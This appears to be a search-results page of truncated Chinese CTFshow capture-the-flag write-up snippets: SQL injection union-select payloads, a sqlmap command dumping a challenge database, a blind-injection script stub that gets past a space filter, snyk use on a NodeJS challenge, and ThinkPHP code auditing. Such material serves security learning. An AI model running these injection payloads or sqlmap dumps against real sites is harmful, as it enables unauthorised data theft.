web341 和上一题的区别是没有了api.js没法再进行命令执行了 但是我们上面有个非预期解还记得吗 那个非预期姐是这个预期解 我们需要利用一个工具来找到这个漏洞--snyk sudo apt update sudo apt install nodejs npm sudo npm install -g snyk 然后 snyk auth授权再把源码托到虚拟机里进入源码 snyk test即可中间...
$ sqlmap -u "http://c9d3e765-d676-4c4c-a87b-3b99ebf5e70b.challenge.ctf.show:8080/api/index.php" --method=put --data="id=1" --headers="Content-Type: text/plain" --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump web204 sqlmap的使用 $ sqlmap -u "http://38e4a4ea...
CTFshow NodeJs web341 先下一个叫snyk的工具 进kali,sudo su进入root用户 apt install npm 下载npm sudo npm install -g snyk 安装snyk snyk auth进行授权,会自动跳转到一个网页,我选的是github授权。 如果github上不去的话,物理机上面科学上网开个全局就行了,这样虚拟机也能用。 snyk test 测试一下snyk能...
CTFSHOW WEB入门 sql注入 回到顶部 WEB171 没过滤什么,直接写payload 测一下回显数目 1'union select 1,2,3 --+ 查看数据库 1'union select 1,database(),3 --+ 查看表名 1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow_web'--+...
web176 解法一 解法二 web177 web 178 解法一 解法二 web179 解法一 解法二 web180-182 ...
ctfshow7 web 看到这样的url判断是sql注入 试了几个碰到空格就错误有过滤,看了别的wp是sql注入盲注 过滤了空格符,可以用/**/绕过,抓包 import requests s=requests.session() url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'...
据thinkphp3.2.3开发手册可知,url模式为 http://serverName/index.php/模块/控制器/操作 所以 web570 该题给了个源码进行审计 Common/conf/config.php是thinkphp的一个应用配置配置文件,加载优先级如下图 call_user_func()也算是一个比较常见的代码执行函数...